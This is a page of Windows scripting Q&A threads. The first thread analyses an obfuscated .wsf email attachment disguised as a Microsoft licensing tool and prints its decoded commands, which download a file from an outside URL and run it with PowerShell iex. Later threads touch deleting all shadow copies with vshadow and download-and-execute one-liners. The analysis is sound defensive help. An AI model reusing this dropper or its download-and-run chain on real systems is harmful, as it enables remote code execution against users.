this morning I received a mal containing, among other things, a file with the extension .wsf, on which I inadvertently clicked.
I immediately realized that I had made a mistake ... but too late :(
Can you tell me if it is malicious code?
Here is the code:
<package><job id="zXGYF_83"><script language="VBScript">
' Version: 10.7.91
'
' Copyright (c) Microsoft Corporation. All rights reserved.
'
' Windows Software Licensing Management Tool.
'
Set ISUaUv=WScript.CreateObject("WScript.Shell")
jpHg="&&wp|2vixrm`)exehtte)$wp|2vixrm3^694Q;4W4;WWPHJH3veqs3qsg2oveqlxm{qm33>wtxxl$GVwvpMHv$vijwrevx3$$rmqhewxmf*&&$g1$ppilwvi{stdev$$|im€$Qp($?krmvxW1xyS$€wp|2vixrm`)exehtte)$gkAQp($*$$g1$$ppilwvi{st"
arr=split(jpHg,"dev")
For Each nEZVNX In arr
KcSOUa=""
fInEJ=Len(nEZVNX) - 1
For intI = 0 to fInEJ
KcSOUa=chr(Asc(Mid(nEZVNX,intI + 1 ,1 ))+0-4)+KcSOUa
Next
ISUaUv.run KcSOUa,false,-1
Next
</script></job></package>
Thank you!
The fact it obfuscates itself is a good indicator it maybe malicious, if you want to see what it's attempting to run you can;
Comment out this line (like below);
'ISUaUv.run KcSOUa,false,-1
Add this line below it;
WScript.Echo KcSOUa
When you run the script you will get this output;
Output:
powershell -c ""&bitsadmin /transfer rDIlrsRC https://imwithmark.com/omar/DFDLSS70S07M052Z/inter.xls %appdata%\inter.xls""
powershell -c & $lM=gc %appdata%\inter.xls| Out-String; $lM |iex
Judging by the first line, the script is using the BITSAdmin service (built into Windows) to initiate a download from the remote URL into a local XLS file stored inside your user profile AppData folder. As for the second, I'm not clear on what that does but someone with more PowerShell knowledge will be able to shed light on it.
Update
It looks to be using gc (Get-Content applet in PowerShell) to pull the content of the file into a string using the Out-String command. It then pipes this to iex (Invoke-Expression command) to be executed.
The likelihood is the inter.xls file that was downloaded contains malicious commands that are then being locally executed in the context of the local system. This is a classic script kiddie hack to get around remote code execution.
Related
We have an old Windows Server 2003 r2 which is doing nothing but using the task scheduler and a VBS file to check and rename some regularly re-occurring data files. It is setup to run every hour using my credentials. If I "run" it while I'm logged on the task runs and completes correctly. When no one is logged on the task runs but completes with an 0x1 code, ie it failed.
I have checked the event logs and see nothing which I can identify as an error or failure. We believe that it was running successfully until about 6-8 months ago (yes, it was one of those set it up and forget it things and we have not been regularly checking it).
=================Additional Information===============
I ran assoc .vbs and got this output: .vbs=VBSFile
I'm not sure how to determine the user environment variables?
For the task I have tried both the vbs file and also a bat file containing the reference to the vbs file. Both run when I'm logged and both fail to complete successfully when I'm not.
Here is the vbs script:
Dim fso, file, recentDate, recentFile, theFile, myfolder, mypath
set fso = CreateObject("Scripting.FileSystemObject")
set recentFile = Nothing
mypath = "D:\TheFTP\Main\Camera\lobby"
set myfolder = fso.GetFolder(mypath)
For Each file in myfolder.Files
If (recentFile is Nothing) Then
set recentFile = file
ElseIf (file.DateLastModified > recentFile.DateLastModified) Then
set recentFile = file
End If
Next
fso.CopyFile mypath& "\" & recentFile.name, "D:\TheFTP\main\camera\cam3.jpg"
set recentFile = nothing
set fso = nothing
Here is the last bat file where I have piped the output to a file:
C:\windows\system32\cscript.exe c:\CopyWebCamFile.vbs > c:\debug.txt
Debug.txt output when I'm not logged on shows an error, see below, which is not there when I run it and am logged on:
Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
CScript Error: Initialization of the Windows Script Host failed. (The system cannot find the file specified.
=====================================================
More information, I added several Wscript.Echo statements to my script, before the first line, after the FOR loop and before the "copyFile" command. When I'm logged on I see all of the output in C:\debug.txt. When NOT logged on I see the same above error message, ie no Wscript.Echo output. This would see to indicate that it can not find my vbs file when I'm not logged on.
===========================
Still no happiness here. I moved and modified the .bat file to also output the contents of the script file:
type H:\Task_Stuff\CopyWebCamFileTest.vbs > H:\Task_Stuff\debug2.txt
C:\windows\system32\cscript.exe H:\Task_Stuff\CopyWebCamFileTest.vbs > H:\Task_Stuff\debug.txt
As before I get output to both .txt files when it runs while I'm logged on and nothing in debug2.txt and the usual messages in debug.txt when I'm not.
I'll fiddle with the antivirus settings, but I need to ask about that first. We are using Symantec SEP.
How can I check on the user environment variables?
====================
Maybe this will clarify my problem or suggest a solution??
Can you offer any ideas...RDK
First off we would like to thank LeeHarvey1 for his time and suggestions as we searched for the cause of this issue. In the end it was one of his suggestions that fixed the problem, but we still have no idea what caused it.
A reboot of the system cleared up all of the issues surrounding the task scheduler and running VB Scripts! We had considered his early suggestion, but discounted it as this server had only been up for a little over 3 months. Not excessive in our experience. However, when all else failed we elected to do that and "voila" it fixed the issue. We wish we knew what caused it but are now just happy we can move on to other things.
Thanks again LeeHarvey1....
I have seen mentions in other places to a -regserver argument to cscript or wscript - but can't find any info that precisely defines what this option does or really clarifies when you'd want/need to use it.
Even the built-in help does not mention it:
λ cscript /?
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.
Usage: CScript scriptname.extension [option...] [arguments...]
Options:
//B Batch mode: Suppresses script errors and prompts from displaying
//D Enable Active Debugging
//E:engine Use engine for executing script
//H:CScript Changes the default script host to CScript.exe
//H:WScript Changes the default script host to WScript.exe (default)
//I Interactive mode (default, opposite of //B)
//Job:xxxx Execute a WSF job
//Logo Display logo (default)
//Nologo Prevent logo display: No banner will be shown at execution time
//S Save current command line options for this user
//T:nn Time out in seconds: Maximum time a script is permitted to run
//X Execute script in debugger
//U Use Unicode for redirected I/O from the console
and nor does Microsoft's documentation.
Note - I gather from some of the external articles I linked to that this option can be used to recover from some bugs in Windows XP and maybe also Vista. But that doesn't actually explain what this option DOES or why it exists. I don't think Microsoft added it after the fact as a FIX, but rather people could take advantage of it to address whatever those problems were in XP/Vista.
EDIT: Just because two questions have same/similar answers does not make them duplicates. The same information can answer multiple different questions. The question referred to as a potential duplicate doesn't have anything to do with the scripting executables. The value of THIS question is that someone using those tools can actually search and find an answer. They will not readily find the other one (as I did not when extensively searching/Googling before I posted this).
These are not actually unique arguments to cscript or wscript; rather they are standard arguments in Windows to any EXE which can act as a COM server.
See this related question for more details of how they operate: https://superuser.com/questions/1164298/what-actually-happens-during-regserver-unregserver
This is at least partly documented here:
If the server is packaged in an EXE module, the application wishing to
register the server launches the EXE server with the command-line
argument /RegServer or -RegServer (case-insensitive). If the
application wishes to unregister the server, it launches the EXE with
the command-line argument /UnregServer or -UnregServer.
The
self-registering EXE detects these command-line arguments and invokes
the same operations as a DLL would within DllRegisterServer and
DllUnregisterServer, respectively, registering its module path under
LocalServer32 instead of InprocServer32 or InprocHandler32.
I am new to programming and need some help.. I need to write a powershell script and as part of it it needs to run an external executable... However I am having issues with the script not asking for an argument and even if I pass one it just seems to wait without asking anything.. so here is the part in question
#Part of my script
$app = "D:\project1\files\vshadow.exe"
$arg1 = "-da"
$arg2 = "Y"
& $app $arg1 $arg2v
+++++++++++++++++++++++++++++++++++++
This is what I get in the console
PS D:\project1\files> C:\Users\Administrator\Desktop\test.ps1
VSHADOW.EXE 3.0 - Volume Shadow Copy sample client.
Copyright (C) 2005 Microsoft Corporation. All rights reserved.
(Option: Delete all shadow copies)
+++++++++++++++++++++++++++++
so the .exe is to clear volume shadow copies with a -da flag (clear all).. however the step requires a Y to continue.. this when I run from cmd.exe
D:\project1\files>vshadow.exe -da
VSHADOW.EXE 3.0 - Volume Shadow Copy sample client.
Copyright (C) 2005 Microsoft Corporation. All rights reserved.
(Option: Delete all shadow copies)
This will delete all shadow copies in the system. Are you sure? [Y/N]
++++++++++++++++++++++++++++++
any help would be appreciated
Thanks,
Tom
Its doc says -da requires confirmation but does not provide a way to override. You might be able to pipe in the user input... Try this -
echo 'y' | cmd.exe /c vshadow.exe -da
I do not know of PowerShell being able to act like an Expect script.
That said, you may be able to get around the user input requirement of the -da option. Use a vshadow query to get all copies, then pipe to a foreach loop to do a vshadow delete (-ds).
Why I ask is that my program uses 3rd party software that sometimes leaves behind orphan processes that have no link back to my program or the 3rd party process. These orphan processes start to add up and consume tons of resources over time. I would like to kill them off periodically, but in order for me to do that, I need to know for sure they were created by my program and not some other program. I have viewed the orphan processes in Process Explorer and when looking at the properties of the process, I see a field called "Current Directory". The current directory for the orphaned process is the install directory of my program. This would give me reassurance I am killing a process created by my program.
Since these processes are created by a 3rd party, I need to just kill them after they are created by running taskkill on them or something. Is there a way to figure out the current working directory of a process using out of the box windows commands in a batch file? If this can be done through wmic queries that would be preferable, but I cannot seem to find the current working directory when using wmic. I assume if Process Explorer is able to obtain this info, I should be able to get it too through some batch commands.
tlist from WDK to the rescue! The 2nd line of its output ("CWD: ...") shows the working directory of a process:
> tlist 944
944 postgres.exe
CWD: D:\Lab\Database\pgsql\test\
CmdLine: "D:/Tools/pgsql/bin/postgres.exe" -D "."
VirtualSize: 221116 KB PeakVirtualSize: 242620 KB
WorkingSetSize: 17076 KB PeakWorkingSetSize: 19336 KB
NumberOfThreads: 4
9084 Win32StartAddr:0x00000000 LastErr:0x00000000 State:Waiting
8504 Win32StartAddr:0x00000000 LastErr:0x000000b7 State:Waiting
8616 Win32StartAddr:0x00000000 LastErr:0x00000000 State:Waiting
7468 Win32StartAddr:0x00000000 LastErr:0x00000000 State:Waiting
9.3.5.14202 shp 0x0000000000400000 D:\Tools\pgsql\bin\postgres.exe
6.1.7601.18247 shp 0x00000000770D0000 C:\Windows\SYSTEM32\ntdll.dll
...
See the doc for more info.
Handle is an utility that displays information about open handles for any process in the system. You can use it to see the programs that have a file open, or to see the object types and names of all the handles of a program.
Its GUI-based version is Process Explorer .
handle -p yourProcess.exe > log.txt
It'll list all handles for yourProcess.exe in log file and now using batch command you can easily extract 'current working directory' of yourProcess from log.txt.
added by barlop
here is the output.. for process c:\tinyweb\tiny.exe run from c:\tinyweb\rrr
C:\Users\user>handle -p tiny.exe
Nthandle v4.1 - Handle viewer
Copyright (C) 1997-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
------------------------------------------------------------------------------
tiny.exe pid: 20668 compA\user
10: File C:\Windows
1C: File C:\tinyweb\rrr
9C: File C:\tinyweb\rrr\access_log
A0: File C:\tinyweb\rrr\agent_log
A4: File C:\tinyweb\rrr\error_log
A8: File C:\tinyweb\rrr\referer_log
E4: Section \Sessions\1\BaseNamedObjects\__wmhr_msgs_buffer_name$1e74
EC: File C:\Windows\winsxs\x86_microsoft.windows.common-controls_659
C:\Users\user>
If you want to parse it specifically then you could do it in pure cmd.exe with e.g. for /f, or with a third party scripting language like ruby, or with windows ports of various *nix style command line tools. This line uses such tools and gets it (obviously the following line requires grep and sed, preferably decent versions of them e.g. from cygwin)
C:\Users\harvey>handle -p tiny.exe | grep "pid:" -A 3 | sed -n "3p" | grep -o ".:[\]\S*"
C:\tinyweb\rrr
The following will work, though you only need "CommandLine" or "ExecutablePath" - not both:
wmic process where "ProcessID=1111" get CommandLine, ExecutablePath
It will return something like the following, showing where the program for PID 1111 is running:
"C:\Program Files (x86)\Common Files\MyProgram\Agent\agent.exe"
I am looking for the shortest command that would download a file (http) and execute it on Windows.
We assume that the user executing the command is local Administrator and that you cannot use any tools that are not available by default on Windows.
It must work with: Windows 7 and Windows 2008. Extra kudos if someone gives a solution that also works with Windows XP and Windows 2003.
Reasoning: that for deploying stuff on different Windows machines. Using WMI or other methods is not an option because these are not enabled by default and also because machines can be inside our outside a domain, which makes the problem more complex, especially.
Note: If this cannot be done in a command line, a script will do. Let's assume that the file to be downloaded is located at "http://example.com/setup.exe" and that you want to run it with "-y" parameter after it is downloaded.
You specified http, so using ftp command in command line would not be ok? Maybe cscript + VB then?
To download file:
https://serverfault.com/questions/29707/download-file-from-vbscript
To run file:
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run (strHDLocation & "-y")